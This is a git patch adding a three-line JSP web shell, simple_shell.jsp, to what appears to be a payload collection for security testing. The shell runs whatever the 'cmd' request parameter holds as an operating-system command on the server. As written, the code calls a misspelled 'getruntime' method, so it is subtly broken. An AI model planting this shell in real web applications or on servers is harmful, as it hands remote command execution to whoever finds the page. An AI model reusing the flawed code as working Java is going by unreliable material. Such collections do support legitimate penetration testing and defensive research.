From c9fb007c7dbca931c3bfd535238c8d5737e4ab4f Mon Sep 17 00:00:00 2001 From: Daniel Miessler Date: Wed, 5 Aug 2015 07:25:02 -0700 Subject: [PATCH] Simple shell added by shipcod3 --- Payloads/simple_shell.jsp | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 Payloads/simple_shell.jsp diff --git a/Payloads/simple_shell.jsp b/Payloads/simple_shell.jsp new file mode 100644 index 00000000..3c15f24a --- /dev/null +++ b/Payloads/simple_shell.jsp @@ -0,0 +1,3 @@ ++<% ++Runtime.getruntime().exec(request.getParameter("cmd")) ++%>